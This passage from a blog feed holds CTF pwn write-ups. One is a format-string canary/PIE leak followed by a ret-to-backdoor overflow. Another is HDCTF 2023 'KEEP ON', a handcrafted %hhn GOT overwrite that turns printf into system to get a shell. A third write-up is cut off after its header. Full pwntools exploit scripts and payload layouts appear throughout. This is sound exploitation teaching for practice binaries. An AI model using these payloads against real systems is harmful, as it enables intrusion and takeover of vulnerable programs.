|...|...|Local variable buffer|No|
|**Canary**|`rbp - 0x8`|You already got it|No (only used to bypass Canary)|
|**Saved RBP**|`rbp`|The previous function&apos;s stack base|**No** (a stack address, not a code address)|
|**Saved RIP**|`rbp + 0x8`|**Return address**|**Yes! (This is the target)**|

The corresponding offset is easy to calculate: it&apos;s two offsets above the canary: `%19$p`
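
Both indices come from the same arithmetic, which the following sketch spells out. It assumes, as found by counting above, that index 6 corresponds to the first 8 bytes of `format` at `rbp-0x60`; `fmt_index` is a hypothetical helper.

```python
WORD = 8                 # one stack slot on x86-64
FIRST_STACK_INDEX = 6    # %6$p shows the first 8 bytes of format


def fmt_index(rbp_offset_of_format: int, rbp_offset_of_target: int) -> int:
    """Positional index N for %N$p, given offsets relative to RBP
    (format at rbp-0x60 is passed as -0x60)."""
    distance = rbp_offset_of_target - rbp_offset_of_format
    return FIRST_STACK_INDEX + distance // WORD


canary_index = fmt_index(-0x60, -0x8)      # canary at rbp-0x8
saved_rip_index = fmt_index(-0x60, 0x8)    # return address at rbp+0x8
print(f"%{canary_index}$p %{saved_rip_index}$p")
```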

At this point, only one final problem remains in this challenge: how to process the leaked data?
#### Data processing
First, let&apos;s look at the format of the leak.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151928368.png)
Here, to split the received data, we can use the `recvn(count)` function, which receives exactly the specified number of bytes.
To avoid miscounting, use Python&apos;s `len()` function.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151932450.png)

```python
io.recvn(19)
leak_text = io.recvn(14)
canary = io.recvn(18)
```
Here I use `io = process(&apos;./program&apos;)`.

Key point!!!
When doing Pwn challenges, the &quot;**shape transformation**&quot; of data is the most essential basic skill. We usually jump back and forth among three forms:
1. **Integer**: used for arithmetic calculations (for example, `libc_base + system_offset`).
2. **Bytes**: used to send Payloads (for example, `b&apos;\xef\xbe\xad\xde&apos;`).
3. **String/Hex String**: usually the leaked content output by the program (for example, `b&quot;0x7ffff...&quot;`).

What we receive here is a Hex String, and what the payload ultimately needs is Bytes.
Since the `p64()` function already turns an Integer into Bytes, we first convert the Hex String into the intermediate type, Integer.
That conversion uses the `int(x, base)` function, where the optional parameter `base` specifies the base (16 here).
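
A minimal sketch of that conversion chain, without pwntools, might look like this. The leaked bytes are made up but follow the same 14 + 18 layout, `split_leak` is a hypothetical helper, and the local `p64` is a stand-in that matches what the pwntools `p64()` produces under its default little-endian setting.

```python
def split_leak(data: bytes) -> tuple:
    """Cut the leak into a 14-byte code pointer and an 18-byte canary,
    mirroring the two recvn() calls."""
    return data[:14], data[14:32]


def p64(value: int) -> bytes:
    """Integer to 8 little-endian bytes."""
    return value.to_bytes(8, "little")


# Made-up leak in the same format as the program output.
leak = b"0x55555555546f0xa1b2c3d4e5f60700"
rip_text, canary_text = split_leak(leak)

saved_rip = int(rip_text, 16)     # Hex String to Integer (the 0x prefix is accepted)
canary = int(canary_text, 16)
print(hex(saved_rip), hex(canary), p64(canary))   # Integer to Bytes for the payload
```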
### ③ Exploit Development
Next comes the full exp.
```python
from pwn import *
context.log_level = &apos;debug&apos;
# io = remote(&apos;node4.anna.nssctf.cn&apos;,28117)
io = process(&quot;./find_flag&quot;)
print(f&quot;PID = {io.pid}&quot;)
io.sendlineafter(b&apos;What\&apos;s your name? &apos;,b&apos;%19$p%17$p&apos;)
io.recvuntil(b&apos;, &apos;)

save_rip = int(io.recvn(14),16)
canary = int(io.recvn(18),16)
print(save_rip)
print(canary)
program_base = save_rip - 0x146F
backdoor = program_base + 0x1229
ret = program_base + 0x13F8
payload = b&apos;a&apos; * 0x38 + p64(canary)
payload += b&apos;b&apos; *0x8 + p64(ret) +p64(backdoor)
io.recv()
io.sendline(payload)
io.interactive()
```

By the way, this challenge requires stack alignment, so pay attention to line 17: the extra `ret` gadget placed before the backdoor address is there to realign the stack.
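
To see where each field of the payload lands, here is a small offline sketch that rebuilds it with the standard library. The canary and base values are invented for illustration, and the local `p64` is only a stand-in for the pwntools function; the offsets (0x38, 0x13F8, 0x1229) are the ones used in the exploit above.

```python
def p64(value):
    # Stand-in for pwntools p64(): 8-byte little-endian packing.
    return value.to_bytes(8, "little")

canary = 0x1122334455667700          # made-up value; the lowest byte of a real canary is 00
program_base = 0x555555554000        # made-up base, for illustration only
ret = program_base + 0x13F8          # lone ret gadget, used only to realign the stack
backdoor = program_base + 0x1229

payload = b"a" * 0x38 + p64(canary)  # fill the buffer, then restore the canary
payload += b"b" * 0x8                # saved rbp (its value does not matter here)
payload += p64(ret) + p64(backdoor)  # the extra ret shifts rsp by 8 before the backdoor runs

print(len(payload))
```

Dropping `p64(ret)` would shorten the payload by 8 bytes and leave `rsp` off by 8 when the backdoor starts, which is the alignment problem mentioned above.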
### ④ Final Exploitation
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512151946575.png)


## Tools Used
IDA, pwndbg

## Key Takeaways
Data type conversion

---

### Technical Insights
Here I also recorded some extra notes on PIE debugging and data conversion for my own future reference, in case I forget; they are not directly related to this challenge.
#### PIE
##### 1. Use Pwndbg&apos;s dedicated commands (most recommended)
* **`piebase` command**
After the program starts running, directly enter `piebase`, and it will automatically calculate and print the current base address.
Even better, you can include an offset directly in the calculation. For example, if the offset of some function in IDA is `0x1234`, you can enter:
`piebase 0x1234`
It will directly tell you the current real absolute address of that function.
* **`brva` (Break Relative Virtual Address)**
This is the most practical command. You don&apos;t need to know the base address; just set a breakpoint directly using the offset from IDA.
Suppose the offset of the `main` function or some vulnerability point is `0x1145`:
```bash
pwndbg&gt; brva 0x1145
```
Pwndbg will automatically capture the program&apos;s base address, add the offset, and set the breakpoint for you.
* **`breakrva`**

Same as `brva`, this is its full name.
##### 2. Pwntools + GDB integration (most commonly used when scripting)
When writing exploit scripts, we usually use `pwntools`&apos;s `gdb.attach` for debugging. Pwntools is very smart and can recognize PIE.
You can write it directly like this in a Python script:
```python
from pwn import *

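context.terminal = [&apos;tmux&apos;, &apos;splitw&apos;, &apos;-h&apos;] # or your own terminal setup
p = process(&apos;./pwn_binary&apos;)

# Method A: use gdbscript
# $rebase is a macro recognized by pwndbg/gef; it adds the current base address to an offset
gdb.attach(p, gdbscript=&apos;&apos;&apos;
    b *$rebase(0x1234)
    c
&apos;&apos;&apos;)

# Method B: use the pwntools ELF object directly (more elegant)
elf = ELF(&apos;./pwn_binary&apos;)
# context.binary = elf
# Combined with gdb.attach, this approach needs explicit address calculation, so it is usually less intuitive than Method A for dynamic debugging
# But you can compute the address first and then attach (if PIE is disabled, or when working from a core dump)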

```
**Note:** If you `gdb.attach` immediately after `process()`, sometimes the base address has not been loaded yet. It is usually recommended to first `p.recvuntil(...)` to let the program run a bit before attaching, or put `start` first in the gdbscript.
##### 3. Disable ASLR at the system level (simplest and most brute-force)
If you only want to debug and analyze the logic locally without dealing with changing addresses, you can directly disable ASLR at the system level.
Although PIE is a compile-time option, address randomization depends on the kernel&apos;s ASLR. If ASLR is disabled, PIE programs will usually load at a **fixed base address** (typically something like `0x555555554000`).
**Execute in the Linux terminal:**
```bash
sudo sysctl -w kernel.randomize_va_space=0
```

* **Advantage:** The address is the same every run, so you can set breakpoints directly with absolute addresses.
* **Disadvantage:** It may make you forget that the real exploitation environment has ASLR enabled, causing you to forget to calculate the leaked base address when writing the exp. **Recommended for analyzing program logic only.**

##### 4. How do you view the offset here?
In IDA Pro, make sure you have enabled &quot;Line Prefixes&quot; (Options -&gt; General -&gt; Disassembly -&gt; Line prefixes).
If it is a PIE program, the address displayed by IDA is usually a small value like `0x1234` (an offset relative to the base address `0`). If IDA displays a large number like `0x401234`, you can use `Edit -&gt; Segments -&gt; Rebase program` to set the base address to `0`, so the addresses shown become pure offsets, which is very comfortable to use directly with `brva`.
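
The relationship between an IDA offset and a runtime address is plain addition. A minimal sketch, assuming the typical no-ASLR base mentioned earlier; `rebase` and `to_offset` are hypothetical helper names, not pwndbg or pwntools functions.

```python
def rebase(base, offset):
    # Absolute address = load base + offset shown in IDA.
    return base + offset

def to_offset(base, address):
    # Reverse direction: turn a runtime address back into an IDA offset.
    return address - base

base_no_aslr = 0x555555554000   # typical PIE base when ASLR is disabled
absolute = rebase(base_no_aslr, 0x1234)
print(hex(absolute), hex(to_offset(base_no_aslr, absolute)))
```

This is the same arithmetic that `piebase 0x1234` and `brva 0x1234` perform for you inside the debugger.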

#### Data Conversion
##### 1. Core killer technique:
Packing &amp; Unpacking. This is by far the most commonly used functionality in Pwn. It solves the problem of &quot;how to turn an integer into its binary form in memory.&quot;
* **`p64()` / `p32()` (Pack)**
* **Function:** convert an integer into a little-endian byte stream.
* **Scenario:** when constructing a Payload, put the calculated address into it.
```python
from pwn import *
# e.g. the address of system is 0xdeadbeef
payload = p32(0xdeadbeef)
# Result: b&apos;\xef\xbe\xad\xde&apos; (byte order is handled automatically)

# Same idea for 64-bit
payload = p64(0x7ffff7a0d000)

```
* **`u64()` / `u32()` (Unpack)**
* **Function:** convert received **raw byte streams** (not strings like &quot;0x...&quot;) back into integers.
* **Scenario:** when you use `p.recv(8)` to read actual memory address data (garbled-looking characters), and need to convert it into an integer to calculate the base address.

```python
# Suppose you received the 8-byte real address of puts
leak_data = p.recv(8) 
libc_base = u64(leak_data) - 0x080a30

```
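If pwntools is not at hand, the same packing and unpacking can be reproduced with built-in integer methods. The sketch below defines local `p64` and `u64` stand-ins (they only mimic the little-endian behaviour described above, not the full pwntools API).

```python
def p64(value):
    # Integer -> 8 little-endian bytes.
    return value.to_bytes(8, "little")

def u64(data):
    # 8 raw bytes -> integer; reject other lengths, as the real u64 does.
    if len(data) != 8:
        raise ValueError("u64 needs exactly 8 bytes")
    return int.from_bytes(data, "little")

addr = 0x7ffff7a0d000
raw = p64(addr)
print(raw)
print(hex(u64(raw)))
```

Packing and then unpacking returns the original integer, which is a handy self-check when debugging a payload.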
##### 2. Handy tools for handling leak data:
Padding and alignment. In 64-bit programs, memory addresses usually only have 6 effective bytes (for example `0x00007f...`), and the high bytes are `00`. If you directly `recv(6)` and then `u64()`, Python will throw an error, because `u64` must consume all 8 bytes.
* **`ljust()` (Left Justify)**
* **Function:** pad characters on the right side of a byte stream until it reaches the specified length.
* **Scenario:** fix 6-byte leaked data, or pad junk data in stack overflows.


```python
# Scenario 1: repair a leak
# Received b&apos;\x10\x20\x30\x40\x50\x60&apos; (6 bytes)
leak = p.recv(6)
# Pad to 8 bytes with \x00, then convert to an integer
addr = u64(leak.ljust(8, b&apos;\x00&apos;))

# Scenario 2: stack overflow padding
# Pad with 0x20 &apos;A&apos; characters
padding = b&apos;A&apos; * 0x20
# Or use ljust (although plain multiplication is more convenient)
padding = b&apos;payload_start&apos;.ljust(0x20, b&apos;\x00&apos;)

```
This pattern is often used in `ret2libc` techniques to parse a leaked libc address.
```python
leaked_puts = u64(io.recvuntil(b&apos;\x7f&apos;)[-6:].ljust(8,b&apos;\x00&apos;))
print(f&quot;leaked_puts: {hex(leaked_puts)}&quot;)
```
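The slicing and padding can be tried offline on a simulated receive buffer. The bytes below are invented; note also that `int.from_bytes` would accept 6 bytes directly, so the `ljust` step is kept only to mirror what `u64()` requires.

```python
# Simulated receive buffer: some prompt text followed by a 6-byte leaked address.
received = b"Hello\n" + bytes.fromhex("a0e5a1f7ff7f")

# Keep the last 6 bytes (the one ending in 0x7f comes last), pad to 8 with zero bytes.
leak = received[-6:].ljust(8, b"\x00")

# Interpret the 8 bytes as a little-endian integer, as u64() would.
leaked_puts = int.from_bytes(leak, "little")
print(hex(leaked_puts))
```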
##### 3. Hex and byte streams
Mutual conversion. Sometimes the program does not output raw bytes, but an ASCII string printed through `printf(&quot;%p&quot;)` (such as `b&quot;0x7ff...&quot;`).
* **`int(x, 16)`**
* **Function:** as you already know, handles ASCII-formatted hexadecimal strings.
* **Note:** Python 3&apos;s `int()` can directly accept the `bytes` type, no need to `.decode()` first.

```python
p.recvuntil(b&quot;address: &quot;)
leak_str = p.recvline().strip() # e.g. b&apos;0x7ff...&apos;
addr = int(leak_str, 16)

```

* **`unhex()` / `enhex()` (Pwntools)**
* **Function:** handle very long Hex strings.
* **Scenario:** some challenges give you text like `deadbeef...`, and you need to turn it back into `\xde\xad...`.


```python
from pwn import *
data = unhex(&quot;48656c6c6f&quot;) # becomes b&apos;Hello&apos;

```
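For reference, plain Python offers the same conversion through `bytes.fromhex()` and `bytes.hex()`. A minimal sketch, assuming only that the input is clean hex text:

```python
data = bytes.fromhex("48656c6c6f")   # hex text -> raw bytes
text = data.hex()                    # raw bytes -> hex text
print(data, text)
```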



##### 4. String search and positioning
When writing automation scripts, you need to precisely locate the position of a leaked address.
* **`find()` / `index()`**
* **Function:** find the position of a specific substring within a byte stream.

```python
data = p.recv()
# Suppose the leaked address is preceded by &quot;Leaked: &quot;
start_index = data.find(b&quot;Leaked: &quot;) + len(b&quot;Leaked: &quot;)
leak = data[start_index : start_index + 6]

```


* **`split()`**
* **Function:** split by delimiter.
* **Scenario:** Canary is often hidden in the middle of a pile of output data.
```python
# Suppose the output is: &quot;Welcome, user: [CanaryBytes] !&quot;
p.recvuntil(b&quot;user: &quot;)
canary = u64(p.recv(8))

```
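When the whole output has already been received as one buffer, `split()` itself can do the positioning. A minimal sketch on simulated data (the 8 canary bytes are invented):

```python
# Simulated output; the 8 bytes between the markers play the role of the canary.
output = b"Welcome, user: " + bytes.fromhex("00a1b2c3d4e5f607") + b" !\n"

# split(sep, 1) cuts at the first marker only, so everything after it stays intact.
after_marker = output.split(b"user: ", 1)[1]

# Slice by length instead of splitting on a trailing delimiter: raw canary bytes
# may contain any value, including the delimiter characters themselves.
canary = int.from_bytes(after_marker[:8], "little")
print(hex(canary))
```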

##### 5. Ultimate lazy-person tool: `flat()`
If you think manually concatenating Payloads is ugly:
```python
payload = b&apos;A&apos;*40 + p64(pop_rdi) + p64(bin_sh) + p64(system)

```

You can use Pwntools&apos; `flat`:

* **`flat()`**
* **Function:** automatically `pack` the integers in the list, concatenate the strings, and generate the final Payload.


```python
payload = flat([
    b&apos;A&apos; * 40,
    pop_rdi,  # automatically recognized as an integer and packed like p64 (needs context.arch = &apos;amd64&apos;)
    bin_sh,
    system
])

```
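What `flat()` does for this simple case can be approximated in a few lines. The helper `flat64` below is hypothetical (it is not part of pwntools and handles only ints and bytes), and the addresses are made up.

```python
def flat64(items):
    # Hypothetical helper: ints become 8-byte little-endian words,
    # bytes objects are copied through unchanged.
    out = b""
    for item in items:
        if isinstance(item, int):
            out += item.to_bytes(8, "little")
        else:
            out += bytes(item)
    return out

# Made-up addresses, for illustration only.
pop_rdi, bin_sh, system = 0x401233, 0x404050, 0x401050
payload = flat64([b"A" * 40, pop_rdi, bin_sh, system])
print(len(payload))
```

The real `flat()` additionally supports nested lists, dictionaries of offsets, and other word sizes taken from `context`.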

---

##### Summary

| Scenario | Raw Data (Input) | Target Data (Output) | Recommended Function |
| --- | --- | --- | --- |
| **Constructing a Payload** | `0xdeadbeef` (integer) | `b&apos;\xef\xbe\xad\xde&apos;` (bytes) | `p32()` / `p64()` |
| **Handling memory leaks** | `b&apos;\xef\xbe...&apos;` (raw bytes) | `0xdeadbeef` (integer) | `u32()` / `u64()` |
| **Handling %p output** | `b&quot;0x7fff...&quot;` (text) | `0x7fff...` (integer) | `int(data, 16)` |
| **Fixing 6-byte addresses** | `b&apos;\x01...\x06&apos;` (6 bytes) | `0x000001...` (integer) | `u64(data.ljust(8, b&apos;\x00&apos;))` |
| **Finding a specific position** | Large chunk of junk data | Index of key data | `data.find(b&quot;key&quot;)` |

### Pitfall Notes
Another challenge that requires stack alignment.
### Pattern Recognition
PIE and canary are enabled, and there is an obvious stack overflow characteristic. At this point, you should think about how to read data from arbitrary addresses to build the conditions for our stack overflow.
## Related Challenges
None for now
## Extended Thoughts
None

---

_Created: 2025-12-15 18:12_</content:encoded></item><item><title>[HDCTF 2023]KEEP ON</title><link>https://goosequill.erina.top/en/blog/202512130011/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512130011/</guid><description>Import notes for [HDCTF 2023]KEEP ON</description><pubDate>Fri, 12 Dec 2025 16:11:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]
&lt;progress value=&quot;100&quot; max=&quot;100&quot; style=&quot;width: 100%;&quot;&gt;&lt;/progress&gt;
# KEEP ON  - Challenge Writeup

&gt; [!info] Challenge Information
&gt; - **Competition**: HDCTF
&gt; - **Challenge**: KEEP ON 
&gt; - **Difficulty**: ★★★☆☆
&gt; - **Protection Mechanism**: NX
&gt; - **Vulnerability Type**: Format String
&gt; - **Exploitation Technique**: GOT overwrite

*Preface:*
This challenge is actually not difficult, and the intended path is very obvious. You can only succeed if not a single byte is wasted.
The reason I wanted to write up this challenge is that the writeups from other experts I saw all used the `fmtstr_payload()` function to construct the `printf()` arbitrary-address write. But since this was my first time working on an arbitrary-address write through a format string, I wanted to try constructing it manually, so I wrote this review note. I hope it is a useful reference for others.
## Vulnerability Analysis
`printf()` reads the `buf` that we can write to, which means we can supply our own format specifiers such as `%s %p %d %n` and so on.
First, use `%p.%p.%p.%p.....` to find the offset, then carefully craft the payload and use `%k$hhn` to overwrite the `printf` GOT entry with the address of `system@plt`. Then use the overflow in the subsequent `read()` call to overwrite the saved return address and return to `vuln()` for a second payload.
Since the first payload has already redirected `printf@got` ---&gt; `system@plt`, when we write `/bin/sh\x00` into `buf`, the `printf(buf)` call actually executes `system(&quot;/bin/sh&quot;)` and gives us a shell.
## Solution Steps
### ① Static Analysis
For the static analysis, I’ll note down the positions of the GOT and PLT in IDA here for convenience when we “handcraft” it in a moment.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512130052286.png)
As shown here, these are the basic things that should be in place.
```python
printf_got = 0x601028
system_plt = 0x4005E0
```
Now let’s begin. Our goal is to write `0x4005E0` into `0x601028` so that during the second payload, when `printf@plt` is called, it actually ends up calling `system@plt`.
#### Constructing an Arbitrary Address Write
To make the thought process clearer, let’s organize the target into a “task list”: (If you can’t understand this table, ask AI about little-endian concepts.)

| **Target Address** | **Target Byte (Hex)** | **Target Value (Decimal)** |
| ------------------ | -------------- | ------------------ |
| `0x601028`         | `E0`           | **224**            |
| `0x601029`         | `05`           | **5**              |
| `0x60102A`         | `40`           | **64**             |

But if we handcraft it in the order above, the padding becomes unnecessarily long. Written in address order, the first one is `%224c%k$hhn`.
`%hhn` stores only the low byte of the running character count, so the count wraps modulo $2^8 = 256$ (a count of 256 is written as `0`). To reach `0x05` after 224 characters we have to print $256 + 5 - 224 = 37$ more, so the next one would be `%37c%k$hhn`.
The last one would be `%59c%k$hhn`. Each wrap-around like this inflates the value of m in `%mc`, which is not very efficient, so we usually write the bytes from the smallest value to the largest:

So we write them in the order `0x601029` `0x60102A` `0x601028`.
The corresponding padding sizes are: `%5c` `%59c`  `%160c`
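
The padding sizes can be double-checked with a few lines of Python. This is a sketch of the arithmetic only, assuming nothing is printed before the first `%mc`; `hhn_pads` is a hypothetical helper name.

```python
def hhn_pads(byte_values):
    # Each %hhn stores (characters printed so far) % 256, so the pad for the next
    # write is the distance from the current count to the next target, modulo 256.
    pads, printed = [], 0
    for target in byte_values:
        pad = (target - printed) % 256
        pads.append(pad)
        printed += pad
    return pads

in_order = hhn_pads([0xE0, 0x05, 0x40])      # 0x601028, 0x601029, 0x60102A
sorted_order = hhn_pads([0x05, 0x40, 0xE0])  # 0x601029, 0x60102A, 0x601028
print(in_order, sum(in_order))
print(sorted_order, sum(sorted_order))
```

Writing in ascending value order avoids every wrap-around, so the total number of printed characters equals the largest target byte.
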
Next, we need to know that the standard structure of an arbitrary address write is:
\[ format string part ] \[ padding characters ] \[ address1 ] \[ address2 ] \[ address3 ]
Through dynamic debugging, we know that the basic offset is: **6** (the dynamic debugging section will record this).
So the \[ format string part ] is: `%5c%11$hhn%59c%12$hhn%160c%13$hhn`
How do we get `k`? Count the length of the format string part: 33 bytes (hint: `%`, `c`, `$`, `h`, `n`, and each digit count as 1 byte). Rounded up to 40 bytes it fills 5 slots of 8 bytes, so the first address lands at offset $6 + 5 = 11$.
Because each `printf` argument slot is 8 bytes wide, \[ padding characters ] = $40 - 33 = 7$
Accordingly, \[ address1 ] \[ address2 ] \[ address3 ] sit at byte offsets 40, 48, and 56 of the payload, and the corresponding stack layout is as follows:
```txt
[ Stack growth direction: high address -&gt; low address ]

Offset |  Memory Content                          |  Explanation
-------|------------------------------------------|-------------------------
 ...   |  (register args RSI~R9 = offsets 1-5)    |
-------|------------------------------------------|-------------------------
       |                                          | &lt;--- the payload starts at this address
 6$    | &quot;%5c%11$h&quot; (8 bytes)                     | format string, part 1
-------|------------------------------------------|-------------------------
 7$    | &quot;hn%59c%1&quot; (8 bytes)                     | format string, part 2
-------|------------------------------------------|-------------------------
 8$    | &quot;2$hhn%16&quot; (8 bytes)                     | format string, part 3
-------|------------------------------------------|-------------------------
 9$    | &quot;0c%13$hh&quot; (8 bytes)                     | format string, part 4
-------|------------------------------------------|-------------------------
 10$   | &quot;naaaaaaa&quot; (8 bytes)                     | end of format string + padding
-------|------------------------------------------|-------------------------
       |  ========== boundary ==========          | exactly 5 slots above (5 * 8 = 40 bytes)
-------|------------------------------------------|-------------------------
 11$   |  \x29\x10\x60\x00\x00\x00\x00\x00        | &lt;--- target address 1 (0x601029)
-------|------------------------------------------|-------------------------
 12$   |  \x2A\x10\x60\x00\x00\x00\x00\x00        | &lt;--- target address 2 (0x60102A)
-------|------------------------------------------|-------------------------
 13$   |  \x28\x10\x60\x00\x00\x00\x00\x00        | &lt;--- target address 3 (0x601028)
-------|------------------------------------------|-------------------------
```
At this point, I believe I’ve explained it clearly enough, but this payload is wrong ❌
However, so as not to confuse everyone at the beginning, the later Pitfall Notes section will explain how we discovered it was wrong and why it needed to be modified that way. Here I’ll just put the correct payload directly. If you can understand it immediately, then there’s no need to read my rambling there.
`%11$n%5c%12$hhn%59c%13$hhn%160c%14$hhnaa[0x60102B] [0x601029] [0x60102A] [0x601028]`
### ② Dynamic Debugging  
To find the offset, you only need to write a lot of `%p` and then observe. I’ll just write 8 of them here.
```python
%p.%p.%p.%p.%p.%p.%p.%p
# set a breakpoint at 0x4007c8
b *0x4007c8
start
c
# then enter the string above
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131033755.png)
To make it easier to show in one image, I reversed the concatenation of the two lines here, but it should still be clear. The upper one is the echo. Let’s analyze the part marked by the green box. You can see this is the result of the 6th `%p`. Although it is not a stack address, we notice the repeated characters `0x70252e`, so we suspect it is the ASCII code of `%p.`. As a result, viewed in little-endian, it is `\x2e -&gt; . \x25 -&gt;% \x70 -&gt; p`, from which we determine that the offset is 6.
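
The little-endian reading can be confirmed in Python. The 64-bit value below is an assumption reconstructed from the input string (the first 8 bytes of `%p.%p.%p...`), not copied from the screenshot.

```python
# Hypothetical value of the 6th %p: the first 8 bytes of our own input,
# read by printf as one little-endian 64-bit word.
slot6 = 0x70252e70252e7025

# Converting back to bytes in little-endian order recovers the text we typed.
print(slot6.to_bytes(8, "little"))   # b'%p.%p.%p'
```

Seeing your own input come back at position 6 is what pins the format string offset.
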
There isn’t much else that needs dynamic debugging here, so I plan to focus the discussion in the Pitfall Notes section.

### ③ Exploit Development
```python
from pwn import *
# io = process(&apos;./hdctf&apos;)
io = remote(&apos;node4.anna.nssctf.cn&apos;, 28306)
elf = ELF(&apos;./hdctf&apos;)
context(arch=&apos;amd64&apos;, os=&apos;linux&apos;, log_level=&apos;debug&apos;)

io.recvuntil(b&apos;name: \n&apos;)
printf_got = elf.got[&apos;printf&apos;]
system_plt = elf.plt[&apos;system&apos;]
vuln = elf.sym[&apos;vuln&apos;]
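a = input()  # pause before sending (handy for attaching a debugger); press Enter to continue
# Automated equivalent, kept for reference; the handcrafted payload on the next line replaces it
payload = fmtstr_payload(6, {printf_got: system_plt})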
payload = b&apos;%11$n%5c%12$hhn%59c%13$hhn%160c%14$hhnaa\x2B\x10\x60\x00\x00\x00\x00\x00\x29\x10\x60\x00\x00\x00\x00\x00\x2A\x10\x60\x00\x00\x00\x00\x00\x28\x10\x60\x00\x00\x00\x00\x00&apos;
io.send(payload)

payload_ret = b&apos;A&apos; * (0x50 + 0x08) + p64(vuln)
io.recvuntil(b&apos;keep on !\n&apos;)
io.send(payload_ret)
io.recvuntil(b&apos;name: \n&apos;)
# io.interactive()
io.send(b&apos;/bin/sh\x00&apos;)

io.interactive()
```
Here I handwrote the payload in little-endian form, so you can also write it in another form:
```python
payload = b&apos;%11$n%5c%12$hhn%59c%13$hhn%160c%14$hhnaa&apos;
payload += p64(0x60102B)
payload += p64(0x601029)
payload += p64(0x60102A)
payload += p64(0x601028)
```
### ④ Final Exploit
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131042547.png)

## Tools Used
IDA, pwndbg, readelf
## Key Takeaways
I learned the construction method and thought process for `fmtstr_payload()`.
### Technical Insight
When you encounter a problem, make sure to use dynamic debugging to see whether the actual changes match what you had in mind!
### Pitfall Notes
Let me record here why the first payload we painstakingly constructed was wrong. We might as well follow the original idea: first check whether it is arranged correctly on the stack, and if it is, then check whether the write succeeds by comparing the state before and after writing. In this way, we can discover where the problem lies.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131051710.png)
This image shows it in great detail. Let’s look at the changed `printf@got` address.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131052315.png)
Look carefully: the arbitrary address write vulnerability was successfully executed, but unfortunately the higher bytes were not zeroed out! This caused address resolution to fail.

| **Byte Offset**  | **+0**   | **+1**   | **+2**   | **+3**   | **+4**   | **+5**   | **+6** | **+7** |
| --------- | -------- | -------- | -------- | -------- | -------- | -------- | ------ | ------ |
| **Original Value**  | `00`     | `01`     | `26`     | **`80`** | **`74`** | **`70`** | `00`   | `00`   |
| **What We Modified** | `E0`     | `05`     | `40`     | (untouched)    | (untouched)    | (untouched)    | (untouched)  | (untouched)  |
| **Resulting Value** | **`E0`** | **`05`** | **`40`** | **`80`** | **`74`** | **`70`** | `00`   | `00`   |

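Therefore, the high bytes of the address need to be cleared. Here, we only need to clear 3 bytes (`+3` to `+5`). Since `%hn` writes 2 bytes and `%n` writes 4 bytes, we use `%n` on `0x60102B` to zero them out. It has to come first in the format string, while the printed character count is still 0.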
```
part1 = &quot;%11$n&quot;        # 5 bytes (Writes 0 to 0x60102B)
part2 = &quot;%5c%12$hhn&quot;   # 10 bytes (Writes 0x05)
part3 = &quot;%59c%13$hhn&quot;  # 11 bytes (Writes 0x40)
part4 = &quot;%160c%14$hhn&quot; # 12 bytes (Writes 0xE0)

# Total length = 5 + 10 + 11 + 12 = 38 bytes ---&gt; [ padding ] = 2 bytes
```
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131059426.png)
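
The length bookkeeping for the corrected payload can be verified offline. A minimal sketch: the local `p64` is a stand-in for the pwntools function, and the base offset 6 is the one found during dynamic debugging.

```python
def p64(value):
    # Stand-in for pwntools p64(): 8-byte little-endian packing.
    return value.to_bytes(8, "little")

fmt = b"%11$n" + b"%5c%12$hhn" + b"%59c%13$hhn" + b"%160c%14$hhn"
padded = fmt.ljust(40, b"a")             # 38 bytes of format string + 2 bytes of padding
addrs = [0x60102B, 0x601029, 0x60102A, 0x601028]
payload = padded + b"".join(p64(a) for a in addrs)

first_addr_slot = 6 + len(padded) // 8   # offset 6 is where the buffer starts
print(len(fmt), len(payload), first_addr_slot)
```

The first address slot works out to 11, which matches the `%11$n` at the start of the format string.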

Also, when testing in a local environment, note that this exploit may fail locally even though it works remotely:
- **Instruction:** `movaps` is an instruction for handling SIMD (Single Instruction Multiple Data), commonly used to accelerate memory copying.    
- **Rigid rule:** This instruction **strictly requires** the memory address being operated on to be a **multiple of 16** (that is, the last digit of the address must be `0`).
- **Current situation:**
    - `RSP` (stack pointer) is `0x7ffef12d4cc8` (ending in **8**).
    - `RSP + 0x50` is `0x7ffef12d4d18` (ending in **8**).
    - **8 is not a multiple of 16** → **BOOM! 💥**
        

**Why does this happen?** This is a common phenomenon in GLIBC on Ubuntu 18.04 and later. The `system` function internally uses `movaps` for performance optimization. In a normal program call, the compiler ensures that the stack is aligned when entering the function. However, because we forcibly changed `printf` into `system` using **GOT Hijack**, we skipped the normal function prologue preparation, causing the stack to be off by exactly 8 bytes when entering `do_system`.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202512131104796.png)
The remote server does not require stack alignment.
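
The alignment check is simple modular arithmetic and can be reproduced with the register value quoted above (the `0x50` displacement is the one from the debugger output).

```python
rsp = 0x7ffef12d4cc8       # RSP value quoted above
operand = rsp + 0x50       # address that movaps operates on

print(hex(operand), operand % 16)   # remainder 8: not 16-byte aligned
print((operand + 8) % 16)           # shifting the stack by one 8-byte slot gives 0
```

This is why inserting or removing a single 8-byte stack slot, for example with one extra `ret` gadget, is the usual fix when the overflow controls the return chain.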
### Pattern Recognition
The program does not filter `%n` `%hn` `%hhn`
The challenge reads user input into `buf` and then calls `printf(buf)`

## Related Challenges
None
## Further Thoughts
This challenge is too rigidly designed; there is one and only one solution path. The author’s control over every byte is extremely precise, not wasting even a single extra byte.

---

_Created: 2025-12-13 00:16_</content:encoded></item><item><title>[BJDCTF 2020]YDSneedGirlfriend</title><link>https://goosequill.erina.top/en/blog/202512102100/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202512102100/</guid><description>Import notes for [BJDCTF 2020]YDSneedGirlfriend</description><pubDate>Wed, 10 Dec 2025 13:00:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]

# YDSneedGirlfriend - Challenge Writeup
&gt; [!info] Challenge Information
&gt; - **Contest**: BJDCTF 2020
&gt; - **Challenge**: YDSneedGirlfriend
